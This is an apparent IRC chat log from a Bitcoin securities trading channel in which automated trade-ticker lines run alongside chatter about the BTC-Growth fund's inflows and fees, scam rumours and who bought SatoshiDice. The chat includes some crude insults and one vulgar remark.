[+] Aug 15 15:03:50 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 15:03:58 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:04:10 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 15:04:12 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:04:13 ThickAsThieves there's just a little btc that found its way into the hands of idiots. Aug 15 15:04:26 it'll have to sift itself back out, it takes a little time. Aug 15 15:05:02 [HAVELOCK] [XBOND] 150 @ 0.00105 = 0.1575 BTC [+] Aug 15 15:06:20 [BTCTC] [BTC-GROWTH] 1000 @ 0.1 = 100 BTC [-] Aug 15 15:06:44 [BTCTC] [BTC-GROWTH] 230 @ 0.1 = 23 BTC [-] Aug 15 15:07:15 [HAVELOCK] [XBOND] 8 @ 0.00105 = 0.0084 BTC [+] Aug 15 15:08:06 [BTCTC] [COG.F2] 1 @ 5.11 BTC [-] Aug 15 15:08:22 [BTCTC] [BTC-GROWTH] 109 @ 0.1 = 10.9 BTC [-] Aug 15 15:08:38 [BTCTC] [BTC-GROWTH] 51 @ 0.1 = 5.1 BTC [-] Aug 15 15:08:43 [BTCTC] [BTC-GROWTH] 6 @ 0.1 = 0.6 BTC [-] Aug 15 15:08:53 [BTCTC] [DMS.MINING] 10 @ 0.002686 = 0.0269 BTC [-] Aug 15 15:09:06 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:09:07 [BTCTC] [DMS.MINING] 30 @ 0.002685 = 0.0806 BTC [-] Aug 15 15:09:19 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:09:21 [BTCTC] [DMS.MINING] 46 @ 0.002684 = 0.1235 BTC [-] Aug 15 15:09:40 [BTCTC] [DMS.MINING] 64 @ 0.002683 = 0.1717 BTC [-] Aug 15 15:09:52 [BTCTC] [DMS.MINING] 100 @ 0.002682 = 0.2682 BTC [-] Aug 15 15:10:17 [BTCTC] [DMS.MINING] 3 @ 0.002889 = 0.0087 BTC [+] Aug 15 15:10:21 [BTCTC] [PAJKA.BOND] 11 @ 0.0125 = 0.1375 BTC [-] Aug 15 15:10:23 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:10:34 [BTCTC] [BTC-GROWTH] 98 @ 0.1 = 9.8 BTC [-] Aug 15 15:10:35 [BTCTC] [BTC-GROWTH] 7 @ 0.1 = 0.7 BTC [-] Aug 15 15:11:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.03989 BTC [+] Aug 15 15:11:34 [BTCTC] [DMS.MINING] 7 @ 0.002889 = 0.0202 BTC [+] Aug 15 15:11:35 [BTCTC] [DMS.MINING] 22 @ 0.00289 = 0.0636 BTC [+] Aug 15 15:11:56 [BTCTC] [DMS.SELLING] 12 @ 0.01786 = 0.2143 BTC [-] Aug 15 15:12:03 [HAVELOCK] [XBOND] 2669 @ 0.00105 = 2.8025 BTC [+] Aug 15 15:12:14 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Aug 15 15:12:25 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:12:48 [BTCTC] [ACTIVEMINING] 1 @ 0.00537 BTC [-] Aug 15 15:12:51 [BTCTC] [PAJKA.BOND] 3 @ 0.01203 = 0.0361 BTC [-] Aug 15 15:13:57 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [-] Aug 15 15:14:00 [HAVELOCK] [LABCO] 4 @ 0.00179995 = 0.0072 BTC [+] Aug 15 15:14:08 [BTCTC] [PAJKA.BOND] 26 @ 0.01053 = 0.2738 BTC [-] Aug 15 15:14:21 [BTCTC] [COG.F2] 1 @ 5.1 BTC [-] Aug 15 15:15:02 [HAVELOCK] [XBOND] 19 @ 0.00105 = 0.02 BTC [+] Aug 15 15:15:05 [BTCTC] [BTC-GROWTH] 51 @ 0.1 = 5.1 BTC [-] Aug 15 15:15:17 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:15:55 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 15:16:11 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 15:16:33 [HAVELOCK] [XBOND] 210 @ 0.00105 = 0.2205 BTC [+] Aug 15 15:16:49 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 15:17:50 [BTCTC] [BTC-GROWTH] 270 @ 0.1 = 27 BTC [-] Aug 15 15:18:32 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [-] Aug 15 15:18:44 [HAVELOCK] [LABCO] 10 @ 0.0018 = 0.018 BTC [+] Aug 15 15:21:01 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [-] Aug 15 15:21:29 [BTCTC] [ASICMINER-PT] 1 @ 3.891 BTC [-] Aug 15 15:21:31 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [-] Aug 15 15:21:31 [BTCTC] [ASICMINER-PT] 1 @ 3.888 BTC [-] Aug 15 15:21:32 [BTCTC] [ASICMINER-PT] 1 @ 3.877 BTC [-] Aug 15 15:21:33 [BTCTC] [ASICMINER-PT] 1 @ 3.872 BTC [-] Aug 15 15:21:35 [BTCTC] [ASICMINER-PT] 1 @ 3.871 BTC [-] Aug 15 15:21:36 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [-] Aug 15 15:21:37 [BTCTC] [ASICMINER-PT] 6 @ 3.868 = 23.208 BTC [-] Aug 15 15:21:46 [BTCTC] [LABCOIN] 20 @ 0.001656 = 0.0331 BTC [-] Aug 15 15:21:47 [BTCTC] [LABCOIN] 2 @ 0.001655 = 0.0033 BTC [-] Aug 15 15:21:49 [BTCTC] [LABCOIN] 60 @ 0.001652 = 0.0991 BTC [-] Aug 15 15:22:19 [BTCTC] [BTC-GROWTH] 500 @ 0.1 = 50 BTC [-] Aug 15 15:22:37 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:22:49 [BTCTC] [ASICMINER-PT] 1 @ 3.868 BTC [-] Aug 15 15:23:21 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:23:31 [BTCTC] [COGNITIVE] 2 @ 0.33 = 0.66 BTC [-] Aug 15 15:23:49 [BTCTC] [DMS.SELLING] 21 @ 0.01785 = 0.3749 BTC [-] Aug 15 15:23:51 [BTCTC] [DMS.SELLING] 26 @ 0.01785 = 0.4641 BTC [-] Aug 15 15:24:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.03989 = 0.1995 BTC [+] Aug 15 15:24:11 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Aug 15 15:24:20 [BTCTC] [BTC-GROWTH] 7 @ 0.1 = 0.7 BTC [-] Aug 15 15:24:44 [HAVELOCK] [AM1] 1 @ 3.9 BTC [-] Aug 15 15:24:47 [BTCTC] [BASIC-MINING] 3 @ 0.2956 = 0.8868 BTC [-] Aug 15 15:24:48 [BTCTC] [COG.F2] 1 @ 5.1 BTC [-] Aug 15 15:24:49 [BTCTC] [COG.F2] 1 @ 5 BTC [-] Aug 15 15:25:31 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [-] Aug 15 15:25:40 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:26:09 [BTCTC] [BTC-GROWTH] 300 @ 0.1 = 30 BTC [-] Aug 15 15:26:23 [BTCTC] [BTC-GROWTH] 725 @ 0.1 = 72.5 BTC [-] Aug 15 15:26:36 Good morning BTC growth Aug 15 15:26:59 [BTCTC] [LABCOIN] 1 @ 0.001654 BTC [+] Aug 15 15:27:22 I don't understand a 72 btc investment in that, but okay Aug 15 15:27:23 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:27:35 [BTCTC] [LABCOIN] 19 @ 0.001654 = 0.0314 BTC [+] Aug 15 15:27:36 [BTCTC] [TAT.MINIGAME] 100 @ 0.000212 = 0.0212 BTC [+] Aug 15 15:27:38 [HAVELOCK] [XBOND] 20 @ 0.00105 = 0.021 BTC [+] Aug 15 15:28:01 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 15 15:29:08 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 15:29:21 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 15:29:43 [HAVELOCK] [XBOND] 99 @ 0.00105 = 0.104 BTC [+] Aug 15 15:30:18 [BTCTC] [BTC-GROWTH] 267 @ 0.1 = 26.7 BTC [-] Aug 15 15:30:26 [BTCTC] [BTC-GROWTH] 40 @ 0.1 = 4 BTC [-] Aug 15 15:30:49 [BTCTC] [BTC-GROWTH] 150 @ 0.1 = 15 BTC [-] Aug 15 15:31:52 almost 900btc is quite the managed fund Aug 15 15:32:53 900? Aug 15 15:33:49 Which fund has that much scratch? Aug 15 15:33:56 [HAVELOCK] [XBOND] 90 @ 0.00105 = 0.0945 BTC [+] Aug 15 15:34:30 btcgrowth almost has Aug 15 15:34:40 and where will he invest it? Aug 15 15:35:14 you'd have to read the prospectus Aug 15 15:35:18 6679 outstanding shares at .1 Aug 15 15:35:35 i meant that literally Aug 15 15:35:44 He's investing in mining funds Aug 15 15:35:44 [HAVELOCK] [XBOND] 30 @ 0.00105 = 0.0315 BTC [+] Aug 15 15:36:06 [BTCTC] [LABCOIN] 20 @ 0.001654 = 0.0331 BTC [+] Aug 15 15:36:08 [BTCTC] [LABCOIN] 640 @ 0.001652 = 1.0573 BTC [-] Aug 15 15:36:09 [BTCTC] [LABCOIN] 11840 @ 0.00165 = 19.536 BTC [-] Aug 15 15:36:22 [BTCTC] [BTC-GROWTH] 4 @ 0.1 = 0.4 BTC [-] Aug 15 15:36:46 [BTCTC] [LABCOIN] 2360 @ 0.00165 = 3.894 BTC [-] Aug 15 15:36:48 [BTCTC] [LABCOIN] 37 @ 0.001644 = 0.0608 BTC [-] Aug 15 15:36:49 [BTCTC] [LABCOIN] 300 @ 0.001643 = 0.4929 BTC [-] Aug 15 15:36:51 [BTCTC] [LABCOIN] 75 @ 0.001641 = 0.1231 BTC [-] Aug 15 15:36:52 [BTCTC] [LABCOIN] 600 @ 0.00164 = 0.984 BTC [-] Aug 15 15:37:11 8754 outstanding Aug 15 15:37:36 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:37:43 Oh, yep, I didn't refresh Aug 15 15:37:49 [BTCTC] [LABCOIN] 573 @ 0.001638 = 0.9386 BTC [-] Aug 15 15:37:51 [BTCTC] [LABCOIN] 402 @ 0.001637 = 0.6581 BTC [-] Aug 15 15:38:02 [BTCTC] [BTC-GROWTH] 205 @ 0.1 = 20.5 BTC [-] Aug 15 15:38:14 [BTCTC] [LABCOIN] 1000 @ 0.001637 = 1.637 BTC [-] Aug 15 15:38:25 [BTCTC] [BFMINES] 10 @ 0.001 = 0.01 BTC [-] Aug 15 15:38:33 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:38:53 [BTCTC] [LABCOIN] 397 @ 0.001638 = 0.6503 BTC [+] Aug 15 15:39:23 [BTCTC] [BTC-GROWTH] 95 @ 0.1 = 9.5 BTC [-] Aug 15 15:39:37 [BTCTC] [BTC-GROWTH] 103 @ 0.1 = 10.3 BTC [-] Aug 15 15:40:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.03989 BTC [+] Aug 15 15:40:50 [BTCTC] [TAT.ASICMINER] 19 @ 0.03989 = 0.7579 BTC [+] Aug 15 15:40:52 [BTCTC] [TAT.ASICMINER] 12 @ 0.03989 = 0.4787 BTC [+] Aug 15 15:40:53 [BTCTC] [TAT.ASICMINER] 19 @ 0.03988 = 0.7577 BTC [-] Aug 15 15:40:54 [BTCTC] [TAT.ASICMINER] 2 @ 0.03984 = 0.0797 BTC [-] Aug 15 15:41:22 [BTCTC] [LABCOIN] 20 @ 0.001639 = 0.0328 BTC [+] Aug 15 15:41:23 [BTCTC] [LABCOIN] 377 @ 0.001638 = 0.6175 BTC [-] Aug 15 15:41:33 [BTCTC] [BTC-GROWTH] 25 @ 0.1 = 2.5 BTC [-] Aug 15 15:42:13 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 15:42:20 [BTCTC] [BTC-GROWTH] 175 @ 0.1 = 17.5 BTC [-] Aug 15 15:42:34 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:42:44 [BTCTC] [DMS.SELLING] 1 @ 0.01781 BTC [-] Aug 15 15:42:47 [BTCTC] [BTC-GROWTH] 220 @ 0.1 = 22 BTC [-] Aug 15 15:43:04 [BTCTC] [DMS.PURCHASE] 1 @ 0.02079 BTC [+] Aug 15 15:43:14 ThickAsThieves well i guess we get to find out. Aug 15 15:43:31 [BTCTC] [LABCOIN] 397 @ 0.001638 = 0.6503 BTC [-] Aug 15 15:43:32 who's running it anyway ? Aug 15 15:43:32 [BTCTC] [LABCOIN] 3103 @ 0.001637 = 5.0796 BTC [-] Aug 15 15:43:40 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 15 15:43:55 he can talk the talk Aug 15 15:44:00 [BTCTC] [DMS.MINING] 1 @ 0.002879 BTC [-] Aug 15 15:44:00 some Dr Aug 15 15:44:04 The good dr Aug 15 15:44:06 http://btcgrowth.com/ Aug 15 15:44:08 with no btc rep afaik Aug 15 15:44:08 BTC Growth – Bitcoin-Denominated Hedge Fund-Style Investing Aug 15 15:44:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005283 = 0.1585 BTC [-] Aug 15 15:44:13 [BTCTC] [ACTIVEMINING] 68 @ 0.005282 = 0.3592 BTC [-] Aug 15 15:44:14 [BTCTC] [ACTIVEMINING] 8 @ 0.00528 = 0.0422 BTC [-] Aug 15 15:44:15 [BTCTC] [ACTIVEMINING] 2 @ 0.005223 = 0.0104 BTC [-] Aug 15 15:44:16 [BTCTC] [ACTIVEMINING] 103 @ 0.005223 = 0.538 BTC [-] Aug 15 15:44:18 [BTCTC] [ACTIVEMINING] 300 @ 0.005222 = 1.5666 BTC [-] Aug 15 15:44:19 [BTCTC] [ACTIVEMINING] 250 @ 0.005222 = 1.3055 BTC [-] Aug 15 15:44:20 [BTCTC] [ACTIVEMINING] 236 @ 0.005221 = 1.2322 BTC [-] Aug 15 15:44:21 [BTCTC] [ACTIVEMINING] 100 @ 0.005206 = 0.5206 BTC [-] Aug 15 15:44:22 [BTCTC] [ACTIVEMINING] 403 @ 0.005205 = 2.0976 BTC [-] Aug 15 15:44:48 [BTCTC] [ACTIVEMINING] 30 @ 0.005225 = 0.1568 BTC [+] Aug 15 15:44:50 [BTCTC] [ACTIVEMINING] 68 @ 0.005224 = 0.3552 BTC [-] Aug 15 15:44:57 [BTCTC] [BTC-GROWTH] 63 @ 0.1 = 6.3 BTC [-] Aug 15 15:45:06 He writes well, but somehow manages to use a lot of words to say very little Aug 15 15:45:09 what could possibly go wrong. Aug 15 15:45:15 [BTCTC] [BTC-GROWTH] 100 @ 0.1 = 10 BTC [-] Aug 15 15:45:24 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 15:45:41 [BTCTC] [BTC-GROWTH] 78 @ 0.1 = 7.8 BTC [-] Aug 15 15:45:48 the only thing is to universally bitchslap the idiots who thought they were "investing" once it goes south, Aug 15 15:45:58 [BTCTC] [ACTIVEMINING] 97 @ 0.005205 = 0.5049 BTC [-] Aug 15 15:46:00 [BTCTC] [ACTIVEMINING] 125 @ 0.005204 = 0.6505 BTC [-] Aug 15 15:46:02 [BTCTC] [ACTIVEMINING] 420 @ 0.005203 = 2.1853 BTC [-] Aug 15 15:46:08 and send them packing once the inevitable "someone should intervene to prevent us from being stupid" start arising Aug 15 15:46:13 [BTCTC] [ACTIVEMINING] 8 @ 0.0052 = 0.0416 BTC [-] Aug 15 15:46:15 [BTCTC] [ACTIVEMINING] 100 @ 0.0052 = 0.52 BTC [-] Aug 15 15:46:15 [BTCTC] [ACTIVEMINING] 100 @ 0.0052 = 0.52 BTC [-] Aug 15 15:46:16 [BTCTC] [ACTIVEMINING] 100 @ 0.00519 = 0.519 BTC [-] Aug 15 15:46:18 [BTCTC] [ACTIVEMINING] 250 @ 0.005185 = 1.2963 BTC [-] Aug 15 15:46:19 [BTCTC] [ACTIVEMINING] 765 @ 0.00518 = 3.9627 BTC [-] Aug 15 15:46:42 like that epic fucktard who wanted asicminer to cover whatever btc he lost by giving it to some unknown that claimed he'll group buy erruptors Aug 15 15:46:42 He even wrote 'Potential participants for whom this document is in any way 'TL;DR' should not participate in this fund'. While I doubt that even half of the people investing read through the complete prospectus Aug 15 15:47:28 [BTCTC] [BTC-GROWTH] 70 @ 0.1 = 7 BTC [-] Aug 15 15:47:39 [BTCTC] [ACTIVEMINING] 235 @ 0.00518 = 1.2173 BTC [-] Aug 15 15:47:42 [BTCTC] [ACTIVEMINING] 20 @ 0.005156 = 0.1031 BTC [-] Aug 15 15:47:44 [BTCTC] [ACTIVEMINING] 60 @ 0.005125 = 0.3075 BTC [-] Aug 15 15:47:45 [BTCTC] [ACTIVEMINING] 40 @ 0.005123 = 0.2049 BTC [-] Aug 15 15:47:46 [BTCTC] [BTC-GROWTH] 26 @ 0.1 = 2.6 BTC [-] Aug 15 15:48:13 [BTCTC] [BTC-GROWTH] 18 @ 0.1 = 1.8 BTC [-] Aug 15 15:48:30 [BTCTC] [BTC-GROWTH] 11 @ 0.1 = 1.1 BTC [-] Aug 15 15:48:39 I've explored doing a fund a number of times and just can't bring myself to do it yet, it just seems like if I'm good enough to make money with my portfolio, why share it? Aug 15 15:48:42 and Aug 15 15:48:58 wtf will everyone invest in? Aug 15 15:49:05 it's not something unknowns should be doing at any rate. Aug 15 15:49:09 [BTCTC] [BTC-GROWTH] 70 @ 0.1 = 7 BTC [-] Aug 15 15:49:27 the fact that tjhey do it nevertheless marks them up for idiots, like our friend kleek here. Aug 15 15:49:39 This guy is charging 2% of assets annually plus 20% of profits for management fees Aug 15 15:49:41 Haha. Aug 15 15:49:50 it's K.L.E.E.C.K. Aug 15 15:49:53 Note the "C" Aug 15 15:49:54 a ok. Aug 15 15:49:57 Common mistake. Aug 15 15:50:00 :) Aug 15 15:50:05 i think long term I could fund out a part of TATI's portfolio, but I want it to have more of a foundation and more unique aspects Aug 15 15:50:20 ThickAsThieves the buy your own shit fund is really a dubious thing to do. Aug 15 15:50:22 It sounds like some kind of hollywood accounting where he gets 2% of gross plus 20% of net Aug 15 15:50:28 [BTCTC] [LABCOIN] 79 @ 0.001637 = 0.1293 BTC [-] Aug 15 15:50:30 I'm not in any fund. I actually commented on Smidges reddit post way back. My portfolio is stronger than his. Aug 15 15:50:30 [BTCTC] [LABCOIN] 40 @ 0.001632 = 0.0653 BTC [-] Aug 15 15:50:31 [BTCTC] [LABCOIN] 15 @ 0.001621 = 0.0243 BTC [-] Aug 15 15:50:32 [BTCTC] [LABCOIN] 2000 @ 0.001619 = 3.238 BTC [-] Aug 15 15:50:46 I said basically what TAT just stated. Aug 15 15:50:47 [BTCTC] [BTC-GROWTH] 80 @ 0.1 = 8 BTC [-] Aug 15 15:50:54 kleeck aren't you purporting to run some asicminer clone with 0 btc cred ? Aug 15 15:50:58 [BTCTC] [BTC-GROWTH] 200 @ 0.1 = 20 BTC [-] Aug 15 15:51:14 Haha. No. Aug 15 15:51:21 [BTCTC] [ACTIVEMINING] 30 @ 0.005207 = 0.1562 BTC [+] Aug 15 15:51:22 [BTCTC] [ACTIVEMINING] 68 @ 0.005208 = 0.3541 BTC [+] Aug 15 15:51:24 [BTCTC] [ACTIVEMINING] 2 @ 0.005209 = 0.0104 BTC [+] Aug 15 15:51:24 smidge has like every mining asset in his fund Aug 15 15:51:25 da fuck. Aug 15 15:51:31 [BTCTC] [BTC-GROWTH] 31 @ 0.1 = 3.1 BTC [-] Aug 15 15:51:37 hey guise. i liquidated all my amethyst shares to buy btcgrowth. who's with me? Aug 15 15:51:40 like sandstorm Aug 15 15:51:53 I saw what he had and was not impressed Aug 15 15:51:54 Someone jokinly stated I was kSlaughter, if that's what you're referring to mircea_popescu. Aug 15 15:51:54 kleeck http://www.virtualminingcorp.com/about.html < is that you ? Aug 15 15:51:59 i'm holding amethyst til the end! Aug 15 15:52:12 well da fuck i took the "someone" seruiously who was it! Aug 15 15:52:14 No, that's not me. I'm not Ken. That was a joke! Aug 15 15:52:15 [BTCTC] [ASICMINER-PT] 1 @ 3.869 BTC [-] Aug 15 15:52:17 [BTCTC] [ASICMINER-PT] 3 @ 3.868 = 11.604 BTC [-] Aug 15 15:52:18 [BTCTC] [ASICMINER-PT] 1 @ 3.867 BTC [-] Aug 15 15:52:19 [BTCTC] [ASICMINER-PT] 1 @ 3.865 BTC [-] Aug 15 15:52:21 trolled! Aug 15 15:52:21 well thanks for clearing that up eh. Aug 15 15:52:24 lol Aug 15 15:52:31 [BTCTC] [BTC-GROWTH] 500 @ 0.1 = 50 BTC [-] Aug 15 15:52:38 [BTCTC] [LABCOIN] 200 @ 0.001616 = 0.3232 BTC [-] Aug 15 15:52:48 [BTCTC] [BTC-GROWTH] 6 @ 0.1 = 0.6 BTC [-] Aug 15 15:52:54 I cleared up some misinformation about ActM and I magically became Ken. Aug 15 15:52:57 Aug 12 22:38:52 wait kleeck is ken? Aug 15 15:52:57 Aug 12 22:38:57 Basically. Aug 15 15:52:57 Aug 12 22:38:58 :) Aug 15 15:53:01 not "someone" dood. you yourself. Aug 15 15:53:02 [BTCTC] [BTC-GROWTH] 230 @ 0.1 = 23 BTC [-] Aug 15 15:53:11 There's a greater context their. Aug 15 15:53:12 i remember.. "ken kleeck" or something Aug 15 15:53:13 there* Aug 15 15:53:17 lol Aug 15 15:53:19 [BTCTC] [TAT.ASICMINER] 67 @ 0.03943 = 2.6418 BTC [-] Aug 15 15:53:21 [BTCTC] [TAT.ASICMINER] 24 @ 0.03942 = 0.9461 BTC [-] Aug 15 15:53:22 [BTCTC] [TAT.ASICMINER] 35 @ 0.0394 = 1.379 BTC [-] Aug 15 15:53:27 ya well... tjhis is the internet. there is no context. Aug 15 15:53:39 Naturally. Aug 15 15:53:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.04028 = 0.0806 BTC [+] Aug 15 15:53:57 Aug 12 22:38:52 wait kleeck is ken? Aug 15 15:53:57 Aug 12 22:38:57 Basically. Aug 15 15:53:57 Aug 12 22:38:58 :) Aug 15 15:53:57 Aug 12 22:39:08 lmao Aug 15 15:53:57 Aug 12 22:39:09 ken is old school Aug 15 15:53:57 Aug 12 22:39:13 didn't you know? Aug 15 15:53:57 Aug 12 22:39:13 scam artist Aug 15 15:53:57 Aug 12 22:39:21 i cant help but reach for my tinfoil hat nonetheless Aug 15 15:53:57 Aug 12 22:39:26 I've been trying to keep it on the DL. Aug 15 15:53:57 Aug 12 22:39:27 userioao: they call it grifting Aug 15 15:53:59 I apologize for the confusion. I thought the sarcasm was more clear than it obviously was. Aug 15 15:54:00 what's the larger context ? Aug 15 15:54:12 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 15:54:20 kleeck dude, i spent two months getting people to accept some scammy miner friend of giga's was not in fact 15. Aug 15 15:54:24 you have no idea. Aug 15 15:54:33 lol Aug 15 15:54:43 [BTCTC] [LABCOIN] 20 @ 0.001591 = 0.0318 BTC [-] Aug 15 15:54:45 [BTCTC] [LABCOIN] 2000 @ 0.001589 = 3.178 BTC [-] Aug 15 15:54:46 [BTCTC] [LABCOIN] 1980 @ 0.001587 = 3.1423 BTC [-] Aug 15 15:55:39 [BTCTC] [BTC-GROWTH] 63 @ 0.1 = 6.3 BTC [-] Aug 15 15:55:52 The context I thought was important was what preceeded what you're copying. Someone posted a video of an engineer and thought it was related to eAsic or something. Aug 15 15:56:12 I think I know who bought sdice Aug 15 15:56:14 [BTCTC] [ASICMINER-PT] 1 @ 3.866 BTC [+] Aug 15 15:56:16 [BTCTC] [ASICMINER-PT] 10 @ 3.865 = 38.65 BTC [-] Aug 15 15:56:18 So I cleared it up, and thought it was clear that knowing what the video actually was didn't make me Seargent Slaughter. Aug 15 15:56:35 mkay. Aug 15 15:56:38 ThickAsThieves who ? Aug 15 15:56:53 sec lemme look it up Aug 15 15:56:56 [BTCTC] [BTC-GROWTH] 7 @ 0.1 = 0.7 BTC [-] Aug 15 15:57:09 [BTCTC] [BTC-GROWTH] 25 @ 0.1 = 2.5 BTC [-] Aug 15 15:57:44 BetCoin Aug 15 15:57:47 orly. Aug 15 15:58:00 http://www.betcoindice.tm/ Aug 15 15:58:14 my guess is they also bought satoshicircle Aug 15 15:58:21 http://betcoin.eu/ < ? Aug 15 15:58:30 yup same site Aug 15 15:58:46 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 15:59:22 judging by the very well to do fonts they certainl;y can afford it. Aug 15 15:59:37 hah Aug 15 16:00:12 [BTCTC] [ASICMINER-PT] 1 @ 3.861 BTC [-] Aug 15 16:00:13 [BTCTC] [ASICMINER-PT] 1 @ 3.861 BTC [-] Aug 15 16:00:14 [BTCTC] [ASICMINER-PT] 5 @ 3.86 = 19.3 BTC [-] Aug 15 16:00:23 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [-] Aug 15 16:02:14 The sell assets to buy btc growth who can then go and buy your assets cheaper trade is one of the funniest trades around Aug 15 16:02:32 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [-] Aug 15 16:02:42 remember https://bitcointalk.org/index.php?action=profile;u=142358 SatoshiDICE_Kat? compared to her user picture, betcoin.eu looks kinda shady designed Aug 15 16:03:04 that's some definitive detective work Aug 15 16:03:46 [BTCTC] [BTC-GROWTH] 5 @ 0.1 = 0.5 BTC [-] Aug 15 16:03:50 lol Aug 15 16:04:01 [BTCTC] [TAT.ASICMINER] 25 @ 0.03946 = 0.9865 BTC [-] Aug 15 16:04:04 that's strong evidence, mr. tat Aug 15 16:04:18 there was news somewhere about how they are starting a 'circle' game too Aug 15 16:04:26 google is not aware Aug 15 16:04:31 so i cant find it Aug 15 16:05:33 [BTCTC] [ASICMINER-PT] 7 @ 3.85 = 26.95 BTC [-] Aug 15 16:05:35 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Aug 15 16:05:45 http://www.scribd.com/doc/160406193/Bitinstant-Class-Action-Lawsuit Aug 15 16:05:48 Bitinstant Class Action Lawsuit Aug 15 16:06:08 Ulysses McGhee Aug 15 16:06:09 lol Aug 15 16:06:12 i dont get it. looked at SatoshiDICE_Kat's history, 3 posts and none in satoshidice thread Aug 15 16:06:23 [BTCTC] [ASICMINER-PT] 1 @ 3.842 BTC [-] Aug 15 16:06:26 [BTCTC] [ASICMINER-PT] 5 @ 3.82 = 19.1 BTC [-] Aug 15 16:06:27 [BTCTC] [ASICMINER-PT] 1 @ 3.811 BTC [-] Aug 15 16:06:36 [BTCTC] [TAT.ASICMINER] 14 @ 0.03947 = 0.5526 BTC [+] Aug 15 16:06:38 [BTCTC] [TAT.ASICMINER] 48 @ 0.03946 = 1.8941 BTC [-] Aug 15 16:06:39 [HAVELOCK] [AM100] 1 @ 0.0382 BTC [-] Aug 15 16:06:42 [HAVELOCK] [AM100] 2 @ 0.0382 = 0.0764 BTC [-] Aug 15 16:06:47 [HAVELOCK] [AM100] 8 @ 0.0381 = 0.3048 BTC [-] Aug 15 16:06:57 [HAVELOCK] [AM100] 1 @ 0.038 BTC [-] Aug 15 16:07:00 [HAVELOCK] [AM100] 1 @ 0.038 BTC [-] Aug 15 16:07:06 i think it's a sleeper account Aug 15 16:07:13 [BTCTC] [ASICMINER-PT] 1 @ 3.811 BTC [-] Aug 15 16:07:25 [BTCTC] [BTC-GROWTH] 266 @ 0.1 = 26.6 BTC [-] Aug 15 16:07:32 [HAVELOCK] [CFIG] 3 @ 0.15 = 0.45 BTC Aug 15 16:07:39 http://i.imgur.com/sIP26Oj.gif Aug 15 16:07:40 lol people really are selling AM to buy BTCGr Aug 15 16:07:43 this is what i received via pm: Hi there! I am the new SD producer, working for the company that just purchased SD. Erik Voorhees can also verify my identity if you need him to - he's the one that got the account set up through the admin, actually, since Satoshi is restricted. Thanks for doing your due diligence - it's an honor to be part of the community :) Kat Aug 15 16:07:45 [BTCTC] [ASICMINER-PT] 1 @ 3.81 BTC [-] Aug 15 16:07:46 [BTCTC] [ASICMINER-PT] 3 @ 3.81 = 11.43 BTC [-] Aug 15 16:07:48 [BTCTC] [ASICMINER-PT] 1 @ 3.81 BTC [-] Aug 15 16:07:53 matuszed totally. Aug 15 16:08:04 [BTCTC] [ASICMINER-PT] 1 @ 3.8 BTC [-] Aug 15 16:08:13 Btc Growth should just do an asset swap for shares Aug 15 16:08:17 save on the fees Aug 15 16:08:39 matuszed if they had any sense. Aug 15 16:08:55 dexX7 what's a producer in this context ? Aug 15 16:09:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.03945 = 0.789 BTC [-] Aug 15 16:09:04 new dice have to first suck her cock ? Aug 15 16:09:05 [BTCTC] [TAT.ASICMINER] 31 @ 0.0394 = 1.2214 BTC [-] Aug 15 16:09:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.0393 = 0.0786 BTC [-] Aug 15 16:09:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.03911 = 0.0782 BTC [-] Aug 